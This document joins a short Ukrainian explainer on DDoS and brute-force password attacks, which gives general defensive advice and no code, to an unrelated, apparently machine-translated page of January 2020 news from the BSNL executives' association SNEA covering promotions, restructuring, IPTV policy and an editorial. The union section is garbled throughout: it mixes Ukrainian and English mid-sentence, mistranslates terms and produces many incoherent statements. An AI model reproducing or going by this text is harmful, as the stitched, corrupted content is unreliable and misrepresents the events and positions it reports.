    DDoS – це фактично така ж атака, як і DoS. Але якщо в DoS один пакет запиту, то в DDoS їх може бути від сотні і більше. Навіть надпотужні сервери можуть не впоратися з таким навантаженням. Наведу приклад.

    DoS атака - це коли ти ведеш розмову з кимось, але тут підходить якась невихована людина і починає голосно кричати. Розмовляти при цьому або неможливо або дуже складно. Рішення: викликати охорону, яка заспокоїть та виведе людину з приміщення. DDoS-атаки – це коли таких невихованих людей вбігає багатотисячний натовп. У такому разі охорона не зможе всіх скрутити і відвести.

    DoS та DDoS виробляються з комп'ютерів, так званих зомбі. Це зламані хакерами комп'ютери користувачів, які навіть не підозрюють, що їхня машина бере участь в атаці сервера.

    Як уберегти себе від цього? Загалом ніяк. Але можна ускладнити завдання хакеру. Для цього необхідно вибрати хороший хостинг із потужними серверами.

    Bruteforce атака

    Розробник може вигадати дуже багато систем захисту від атак, повністю переглянути написані нами скрипти, перевірити сайт на вразливість і т.д. Але коли дійде до останнього кроку верстки сайту, а саме коли буде просто ставити пароль на адмінку, він може забути про одну річ. Пароль!

    Категорично не рекомендується встановлювати простий пароль. Це можуть бути 12345, 1114457, vasya111 і т. д. Не рекомендується ставити паролі завдовжки менше 10-11 символів. Інакше ви можете піддатися звичайнісінькій і нескладній атакі - Брутфорсу.

    Брутфорс – це атака перебору пароля за словником з використанням спеціальних програм. Словники можуть бути різні: латиниця, перебір за цифрами, скажімо до якогось діапазону, змішані (латиниця +цифри), і навіть бувають словники з унікальними символами @#4$%&*~~`’”\ ? та ін.

    Звичайно такого виду атаки легко уникнути. Досить вигадати складний пароль. Вас може врятувати навіть капча. А ще, якщо ваш сайт зроблено на CMS, багато з них обчислюють подібний вид атаки і блокують ip. Треба завжди пам'ятати, що більше різних символів у паролі, тим важче його підібрати.

    Як же працюють "Хакери"? Найчастіше вони або підозрюють, або заздалегідь знають частину пароля. Зовсім логічно припустити, що пароль користувача точно не складатиметься з 3 або 5 символів. Такі паролі призводять до частих зламів. В основному хакери беруть діапазон від 5 до 10 символів і додають туди кілька символів, які знають заздалегідь. Далі генерують паролі із потрібними діапазонами. У дистрибутиві Kali linux є програми для таких випадків. І вуаля, атака вже не триватиме довго, тому що обсяг словника вже не такий і великий. До того ж хакер може використовувати потужність відеокарти. Деякі їх підтримують систему CUDA, у своїй швидкість перебору збільшується аж удесятеро. І ось ми бачимо, що атака в такий простий спосіб цілком реальна. Адже брутфорсу піддаються не лише сайти.

    Дорогі розробники, ніколи не забувайте про систему інформаційної безпеки, адже сьогодні від подібних видів атак страждає чимало людей, зокрема й держав. Адже найбільшою вразливістю є людина, яка завжди може десь відволіктися або десь не доглядати. Ми — програмісти, але не запрограмовані машини. Будьте завжди напоготові, адже втрата інформації загрожує серйозними наслідками!

    Messages updated during the month of Jan 2020

    16-01-2020

    Condolence Message

    SNEA Expresses Deep Sorrow for the Demise of

    Veteran Leader

    Com K.Viswanathan

    CHQ Treasurer of JETA/JTOA (3 Times)

    19/11, D block Nandhini flats church road, Chrompet Chennai 44,


    15-01-2020

    15-01-2020

    15-01-2020

    A Vital Breakthrough for Triple Play FTTH Service через BSNL:

    Open Policy for Provision of IPTV: Дуже оголошені Policy for Provision IPTV Services через BSNL FTTH відповідно до вмісту агентів/партнерів повинні бути враховані BSNL CO.

    Ця стаття є Touched як BSNLs answer to major Private Players providing Triple Play Services--

    Як цей проект, BSNL є реалізувати Real Triple Play Service для покупців тому що Watching TV не їсти в Інтернеті.

    Це є одним з найбільших Lifeline для BSNL revival.

    Ця стаття має бути успішно розроблена і здійснена власноручно в LCO/TIP в Тріссур BA в Керала Circle з технічною підтримкою BSNL в будинку talents led по Com Anoop K J, JTO OMCR, Ernakulam .

    Вони мають пристосовані до App make/receive landphone calls за допомогою мобільного телефону за допомогою WiFi.

    Цей проект був представлений в останній день CWC Meet of SNEA в Bangalore в Augusts, 2019.

    Різні пропозиції мають бути отримані від різних circus для implementation of IPTV через BSNL Network .

    Відсутність IPTV (або телебачення) має бути встановлена ​​як один з найбільших резонансів для лакофарбового сигналу до BSNL FTTH з'єднання з multi operator LCOs над country .

    SNEA має бути спрямований на проект в усіх рівнях і ми можемо бачити світло на кінці tunnel .

    We congratulate in the in-house talents в BSNL, який показує їхній реальний потенційний .

    SNEA має на меті всіх офіцерів, які мають працювати для реалізації проекту в BSNL CO і всіх осередків офісів і особливо Com. P Padmanabha Rao, наш AGS & DGM, BSNL CO.

    IPTV Open Policy  

    15-01-2020

    Organizational Restructuring: Merger of Non-Territorial Circles.

    Maintenance і Project Circles merged and renamed as Core Network-Transmission (East/West/North/South). Separate Circle for North East namely Core Network-Transmission NE Region covering AS, NE I and NE II Circles. Effective from 01.04.2020.

    Telecom Factories merged with respective Territorial Circles як BA head w.e.f 01.02.2020.

    NCNGN Circle merged with BBNW Circle.

    Nodal Centre Chandigarh merged with Punjab Circle.

    Лише один тренуючий коло з HQ в ALTTC, Gaziabad. ALTTC, NATFM і BRBRAITT будуть працювати як BA Heads. Тільки зональні RTTCs в майбутньому.

    Covering letter   Annexure

    15-01-2020


    14-01-2020

    GS write to Shri P K Purwar, CMD/BSNL:

    Kindly таке immediate action for Regular promotion instead of Look after arrangement in different Grades from among the Executives already working in higher scales by mere designation changeдо fill up the huge vacuum created in the field units by VRS 2019 and for motivation the Executives to take extra work load:

    Як для даних available, on 01.02.2020,

    i) Лише 57 DGM(T) буде можливим після зміненого кінця 1481 року.

    ii) Лише 32 DGM(Fin) буде можливим згідно з відповідним кінцем 402.

    iii) Лише 1746 AGM(T) буде доступна в BSNL instead of 6500 AGMs working one year back. На DGM promocion, число AGMs буде бути про 1200, менше ніж 20%. SDEs with 15 years service waiting for promotion.

    iv) Лише 70 CAOs буде можливим за відповідність до кінця 1347 року.

    v) Ті тисячі executives у високих межах є працюючими в JTO, SDE подібних рівнів для 5 до 30 років і продовження для придбання. JTOs recruited з 1988 є waiting for promotion в Arch wing. Thousands of JTOs з 1999, 2001 to 2008, 2010, 2013, etc. JTO(Civil/Elect/TF) wing status is equally bad.

    We total object to the prevalent look after arrangement being followed by the management instead of regular promotion. Executives являють собою все, що працює в високих межах і їх може бути спричинене великими градаціями на регулярних основах тільки для дизайну зміни, включення до LA arrangement.

    GS letter to CMD  

    11-01-2020

    Продовження з Шрі Арвінд Ваднеркар, DIR(HR) на 09.01.2020: GS, President and both AGSs met DIR(HR) в сенсі Sr GM(Pers & Estt), GM(SR), GM(Restg), GM( Admn) and GMs(Pers) and held discussions on the following issues:

    Staffing norms and Restructuring of BSNL: We explained the temporary staffing norm issued by Restg cell is not at all workable as the field realities are no considerated by the management. By the temp norms, some SSAs headed by GMs завжди has to be headed an SDE in the future. Вони будуть великі числа малих SSAs з великими географічними областями, де тільки один або два executives будуть бути збережені. Практично це буде неможливим для здійснення послуг в цих областях. За виняткомсурінгу, роллю і відповідністю executives не буде триматися в основному в сегменті CFA. У регіональних районах, clubbing all works of Transmission, BTS mtce, EB, Cable maintenance with SDE(Group) with vast areas will defeat the very purpose. Подібно до міських районів норми також є stringent. У зв'язку з сучасними norms are to be reworked immediately. Інші люди не можуть йти до роботи в external plant and trans mtce і thos, які працювали також, щоб скористатися програмою в Indoor, mobile etc. Подібно до substitutes не вказано в багатьох SSAs для сприятливого життя на 31.01.2020. Director і GM(Restg) висловлюються, що це тільки сучасні норми, які можуть бути reviewed. We requested to review immediately.

    Ми опинилися в повідомленні з поля сфери, що майновість приміських кабелів також повинна бути включена в tender for outsourcing. За наявними TTs, дуже багато знають, що cable jointing і вони не є достатніми для майнових витрат на всі Primary Cables. Інші вимагаються для Indoor/MDF/Power Plant maintenance. Ці факти випливають з роботи з DIR(CFA), але не сприятливі рішення йдуть від far. DIR(HR) вважається, що це важливе значення, щоб помітити, що DIR(CFA) ще.

    Promotions in post VRS scenario and need for Regular Promotion instead of Lookafter arrangement: Ми міцно протестуємо проти руху за ходом Look after arrangement instead of Regular promotion. Більшість DGM(T/Fin) позицій і AGM/CAO/EE grades буде дзвонити після VRS на 31.01.2020 і нове рішення є для того, щоб сприяти, щоб бути підписаний. Без великих номерів executives with sufficient experiences working in high hers, they can be simply given promotion by designation change, we pointed out. Подібно до тих, хто має JTO в різних кінчиках, є враховані в високоякісних рамках і можуть бути спрямовані на модернізацію. Even DPC не потребує. LA arrangement is against the interest of the Executives as they loses the service and future promotional avenues. Management is making LA years together and denying regular promotions. Вимагають переміщення цього механізму і забезпечують регулярні вправи для всіх елітних executives.

    На DGM promotions, SNEA виконала пропозицію з Secretary, DoT на 01.01.2020 і його позитивний вибір за допомогою DGM promotions. Even DoT given promotion to Sr DDG (CGM) рівень на 30.12.2019 для тих, що від'їжджають на 31.12.2019 але BSNL не є такою кожною дією до сприятливих подій до vacant posts до їх retirement. Після дискусії, DIR(HR) розглядається для обговорення з Secretary/DoT and CMD/BSNL і потрібна для DGM promotions.

    Reversion of 2001 Rect JTOs passed the LDCE -2007: Початок дискусій свідчить про матір і Assn explained їх елітність з посиланням на SDE RR Clase 12, note 5 і clarifications issued в 2007 regarding they eligibility to. Зараз деякі з них є переглянуті на основі clarifications issued in 2012 for the LDCE 2010. Використання має бути вирішено, що базується на виразках, які були зроблені для LDCE 2007, були відповідні. Безсумнівно вони беруть участь в SDEs, вони не можуть брати до уваги наступні DCE в 2012 і 2015 році. We demanded to stop the reversion process till the matter is decided based on the facts placed before the management. We suggested to form a Committee до examine the matter. Наприкінці DIR(HR) directed the concerned Officers to bring all the related files the next day itself for taking appropriate decision.

    10-01-2020

    10-01-2020

    10-01-2020

    Продовження з Шрі П.К.

    DGM (T) Promotions: Regarding promotions from DET to DGM (T), we explained o meeting with Secretary (T) DoT on 1th Jan. (T) передбачено, що він не створює будь-які Additional Financial Implications. CMD BSNL поінформував, що він хотів також розглянути з Секретарі (T) в цьому повідомленні і працював на потребу.

    Clearing pending dos of recoveries from the Salary of the employees: CMD повідомила, що плата за GPF recoveries в Respect of VRS optees, про Rs.710 Crore will be released on Monday. Other dos will also be cleared at the earliest.

    Promotions to fill up vacant posts after VRS: Regarding Promotions, CMD є застереження, що працівники повинні forget promotions for least one year and work hard for Revival of BSNL. Також зрозуміло, що більше merit is to be introduced in promotions in future. We explained the ground realities. Більшість всіх DGM повідомлень в Telecom & Finance Wings є добре як AGM & CAOs повідомлень буде бути нескінченним після 31.01.2020 і це буде неспроможна зробити BSNL thereafter bez filling up цю vacant posts на immediate basis. Там є стягнення в керахи JTO і SDE і їх вправи не можуть бути виконані. На час звільнення з JTOs & JAOs як добре, як в promociones from JTO to SDE, competitive examination є існуючим і практично 50% Executives eligible at the time of promotion є від competitive quota тільки, були розраховані. CMD BSNL узгоджується з шорти в AGM, CAO і DGM posts після post-VRS 2019.

    Насолоджуватися для від'їзду працівників: Про відвідання послуг з відпочинків, ми зайняли відшкодування від Rs 3001/- as it is just token of appreciation of their past services in BSNL and honour for them. CMD повідомила про свою нездатність до фінустанови в BSNL. У тому випадку, ми бачили деякі альтернативні можливості як покупки купонів еквіваленту до того, що. CMD визнали наше зауваження і наблизилися до приміщень до альтернативного додатку до Cash Award.

    Досвід USOF Projects для BSNL на Nomination Basis: We appraised CMD BSNL regarding the lot of USOF Projects to BSNL on Nomination Basis. CMD BSNL mentioned that we have to do all the Govt. Projects/ USOF Projects and our performance during previous years was very good and we have completed the Govt. Projects within time frame. However, ми бачимо, що якщо це ведеться на Nomination Basis, це буде добре для BSNL інші, якщо ми робимо шляхом нагляду, він не може бути вигідним для BSNL.

    Maintenance Primary Cables: We further appraised CMD about difficulties faced by the Executives and different Circles in Post-VRS Scenario in maintaining the Primary Cables since the orders for maintenance of Primary Cable for outsourcing has not been is CMD BSNL вважається, що веде до розвитку робіт ходьби в різних країнах, в першу чергу, щоб бути переміщений/ maintained frequently by taking the permission from different Local State Govt. Bodies/ Highway Authorities for which the Tenderer може не брати до уваги і наше maintenance work will be suffered badly.

    Maintenance of MDF: Ви керуєтеся CMD BSNL, що контролює MDF повинен бути в BSNL Staff. CMD BSNL mentioned те, що наші молоді люди повинні якомога більше, схопити важливі роботи і прийняти відповідність. CMD передбачається, що ведеться до шортажу майна в post VRS гравця не може бути можливим до maintain MDF навколо годинника до BSNL Staff. Після detail discussion, CMD assure до review the situation after three months.

    08-01-2020

    08-01-2020

    SNEA extends solidarity and moral support to the General Strike by the Central Trade Unions on 08.01.2020 на підставі Privatization of Public Sector and other demands

    07-01-2020

    07-01-2020

    Circle Executive Committee, що збирається в Assam Circle, був запрошений в Guwahati на 04.01.2020. GS and Jt Sec(East) addressed extended CEC meeting. CHQ leaders recollected the contribution of senior leaders and the activists taken the VRS. Вони ведуть Association під час різних струків для вилучення різних суперечок і їх contribution будуть remembered for ever. All dos will be settled by 31.01.2020 and their parting with BSNL will be smooth.

    Найуспішніші наші stroggle для років допочатку сильних хороших результатів для BSNL. Management and Govt tried to suppress нашого стругання по багатьох засобах, плата за cuts, шикарні шпильки, show cause notices etc etc but we never compromised. Наприкінці нашого бруківки виходить з 4G спектр вільний термін, як ми повинні, територія перенесена місія, вхідна expanditure of VRS borne by the Govt, 8500 Cr bond with suvereign guarantee approved to give financial support etc.

    Цей головний фокус є на зміну BSNL. 4G launching is planned for 01.03.2020. Переваги є збільшенням, які є хорошим сигналом для промисловості та BSNL. Якщо management is able to implement a good mechanismus taking the employees into confidence, Revival is very much possible. Багатощо depends on the management.

    At Corporate level, BSNL restructuring is going on. У змінених сценаріях, guidelines є призначені для outsourcing of CFA work.

    However we afraid that due to the stringent conditions, it mai fail in many places and BSNL will be in big trouble in maintaining the services after 01.02.2020, we informed the management. Експериментовані лабораторії не можуть бути учасниками в tenders.

    Подібна робота йде в інших verticals також. Як ми повертаємося, в HR vertical, число повідомлень, що coming down drastically by restructuring. VRS thrown різні challenges and post reduction and promotion is one among them. Threat post post reduction був для багатьох років і в anticipation of that, Association worked out non-post based promotion policy well in advance. Наші наші фокуси є для свого попереднього виконання w.e.f з 01.07.2018. Unfortunately, деякі Executive Assn is still demanding post based

    promotion from a prospective date

    (для декількох вакансій) і сприяння управлінню, щоб зменшити реалізацію нової підтримки policy. Управління не ведеться після того, як базується прототип в name of contempt and restructuring and at the time not implementing the new policy. Всі є незмінними для вдосконалення від 01.07.18 його просто не вважають для вдосконалення з prospective date! Можливість буде останній рік для SDE вдосконалення для всіх SDE повідомлень, спрямованих на те, щоб мати велику увагу на важливість питома і відповідь на особисту відповідь CMD і GM(Pers) в CAT/Ernakulam.

    06-01-2020

    Circle Executive Committee, що збирається в Assam Circle, був запрошений в Guwahati на 04.01.2020. GS and Jt Sec(East) attended and addressed the meeting. The CEC unanimously co-opted following Circle Office bearers:

    Circle President: Com Suresh Bora, AGM.

    Circle Secretary: Com Borun Baruah, JTO.

    Treasurer: Com Allauddin Ahmed, AO.

    Cooption become necessary as the earlier OBs opted for VRS 2019. SNEA recognises їх contribution для багато років і wish them all the best.

    SNEA CHQ виріс all the success for newly elected young team.

    03-01-2020

    View Media Reports:

    State-controlled Bharat Sanchar Nigam Limited (BSNL) продовжує приймати себе після отримання креативних інтересів, що беруть участь в еросіоні потенційної поновлення можливостей на back Rs 20,000 crore-strong mega connectivity programs .  

    03-01-2020

    03-01-2020

    Interaction with the Consultant M/s Deloitte:

    BSNL management arranged a meeting with the Consultant M/s Deloitte appointed for giving recommendations on continuity in BSNL Services in posts VRS scenario and the short term measures on 02.01.2020.

    GS, President and bot AGSs зроблено detailed discussion with consulting для двох hours з 1600 Hrs до 1800 Hrs focussing on all the issues that may crop up in the post VRS scenario. У consulting identified acute shortage в DGM, AGM і TT(TM) cadres, що буде impact after the VRS.

    Обговорення спрямовані на широкі положення в області units, як це йти до ефекту після VRS, immediate measures до того, щоб скасувати impact, custommer relation in the post VRS scenario, merger of SSA and Circle, drawback of present BA structure, manpower requirement, motivation of staff etc.

    02-01-2020

    02-01-2020

    GS, President і AGSs met Secretary/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT та інші найкращі Officers of DoT on 01.01.2020, the New Year and held brief discussions. Обговорення з CMD і DIR(HR) на важливих питаннях як реструктуризація і вдосконалення fixed for next week due to the busy schedule.

    Під час засідання з Секретарі/DoT буде визначено питання про DGM(T) promotion which is stopped due to reply given Secretary/DoT in the meeting with Parliamentary Committee that DGM promotion can be issued on after completion of restructur. VRS). Ви знайдете, що всі еластичні DES є допомога і є не reservation involved в DE до DGM сприяння і всі 287 DEs belongs до SC/ST категорії також getting covered. Під час DES, більше ніж 500 DES застосовано до VRS і буде покладатися на проміжок, якщо це буде після 31.01.2020. We further bring to his notice that on 30.12.2019, навіть CGM rank officers retiring on 31.12.2019 є given promotion and allowed to avail the promotion. Але в випадку BSNL Executives just reverse happening.

    Після дискусії Секретарі помітили, що він є сприятливим для DGM вдосконалення: 1) це не може бути будь-яких фінансових спроможностей тільки після VRS і 2) це не створить будь-який спосіб в подібних адресах. Виразно, що це не має будь-яких фінансових наслідків і все працює в великих точках і не буде створювати будь-які предмети в подібних повідомлень як DGM promotion is held up after 2017 due to litigations.

    Це секретаріат вважає, що для обговорення з CMD і якщо інформація є правильним, він буде здійснювати відкликання для DGM promotion.

    01-01-2020

    01-01-2020

    Editorial

    2019: Turbulent період в історії BSNL. We successfully overcome it with unprecedented Unity and Solidarity

    New Year unfolds New Hopes with New Challenges

    У 2019 році, були знайдені через turbulent times, ще не витрачається в історії BSNL з агітаціями один після другого відповідь Revival of BSNL. Вона була дійсно в бойовій або дитині для BSNL працівників. Сьогодні і всі помічені члени SNEA розраховані протягом одного року за редакцією BSNL як і будь-який правий мислення BSNL Executive був поставлений на факт, що його майбутнє є повно залежно від майбутньої BSNL.

    Yes, we had witnessed Repressive measures unleashed by management and Govt against the Associations and Unions to compel them to stop agitations and struggles, allowing BSNL for its natural death by accepting defeat. Але будь-який звільнений як ми були зроблені з різних речей, готові до будь-якої віри і готові до битви до кінця, тому що висновок нашого результату. Yes, it was a do or die battle for all of us which we have to win at any cost.

    Ініціативно, влада була не в усіх серйозних на переказі BSNL. Всім міністерствам були зроблені відповідні плани. Govt wait waiting for the natural death of BSNL. Finance Ministry був з hostile, оприлюднюючи будь-який тип редагування пакета і подання для closure BSNL і MTNL. Стругач, побіжно з боками з успішними ефектами BSNL робітників створюють громадську і медичну думку в боротьбі з BSNL Revival реально worked wonders. SNEA був у протилежному від усіх таких діяльності. The compulsion created by us for political intervention finally worked. Звичайні ефекти з Hon MoC і його ефекти до форми GoM з Home Minister як його човен хлопчика з невеликими ефектами з Secretaries/DoT and both CMDs/BSNL зроблені things happen. Наші ефекти для intervention hon prime міністерства і кінець дзвінка hon prime міністерства йоговідправляються до добре Revival package that will really help revival of BSNL was the most decisive factor.

    Finally the BSNL and MTNL revival package був прийнятий в Union Cabinet на 23.10.2019, вивчаючи новий список життя в BSNL і MTNL. package is have real real potential for Revival of BSNL. 4G spectrum charges of Rs 14,155 Crores plus 18% GST буде боротися з Govt as demanded by us. Від початківця, AUAB стверджує, що Govt повинен бути вільний 4G spectrums до BSNL. Land monetization for clearing the liabilities and meeting the CAPEX also got the Cabinet approval. Ваша вимога для фінансової допомоги також матеріалізована у вигляді тривалого терміну з 10 років за 15,000 Cr для BSNL і MTNL з владою певної guarantee. Наше поняття для merger of MTNL with BSNL, i.e. величезні фінансові можливості, його статус як зареєстрований company і complex HR issues, є gettting addressed before merger takes place. Належність відмінності про 15,000 Crores for VRS is borne the Government as we were opposing any additional financial burden on BSNL in the name of VRS. Створення 5G spectrum is onether favourable decision in offing.

    Сьогодні і кілька робітників з BSNL, особливо Comrades of SNEA може черевик на цій чарівній діяльності, створюючи інші історії в Trade Union рух. Yes Comrades, ми створили history на строгий шпильку для шахраїв з іншими робітниками, для пересування company, setting an example for other sectors. I am very proud and fortunate be part of such a struggle and lead Association of committed members by spearheading the struggle in the banner of AUAB, in the most difficult period. Вони є memorable moments in life.

    Нині, ми є на курсах 2020 року з безліччю hopes and expectations. Ви маєте на увазі для позитивності в BSNL. BSNL revival is first among them.

    4G launching on pan India basis on alotted spectrum повинен не бути роз'єднаний. Людям є добре витрачається на той момент. Equally BSNL answerable to the Govt as after the allotment of free 4G spectrum. Modernization of the network is to be expedited. Operational issues and clearing outstanding dos to labours, contractors, vendors, land owners etc are the immediate challenges to make any outsourcing model successful. BSNL має відповідати confidence among them by clearing their dos which will open the road for the future. Здійснюючи гроші за допомогою свідомих bond і land monetization є дві важливі заходи в тому напрямі. Управління має здійснити з VRS syndrome і запустити роботу на цих роботах для того, щоб зробити це тому, що BSNL є достатнім для здійснення нерозвинених послуг після 31.01.2020. Величезна кількість loyal customers є реально занепокоєння про масивний вільний відпочинок і він є власною відповідальністю до відповіді їх confidence в post VRS scenario. У цьому режимі, управління рішеннями буде дуже практичним.

    У додатку до вищезазначених питань, як management is going to motivate the remaining 47% employees до того, щоб зробити робочий стіл в post VRS situation, як вони є filling up vacuum створеного в області units which is generating revenue etc will have huge на ефектах для пересування BSNL. Шортаж executives в highher level can be easily met by promotion which can be done within couple of days by new policy, simply by taking VC.

    Чи не більше виключень може бути зроблено DoT/Government and BSNL management in name of employee cost as more than 50% employees took VRS, exceeding their target. У нас є надійний менеджмент, що непрофесійний і drastic reduction в executives strength буде мати adverse impact на BSNL пересвідчений і хороший робітників, щоб бути позначений в BSNL. Всі depends on how management is utilizing the remaining employees gainfully в post VRS scenario. A professional approach and quick policy decisions can once again bring BSNL back on track.

    Let us hope that 2020 буде bring good news for BSNL and entire nation.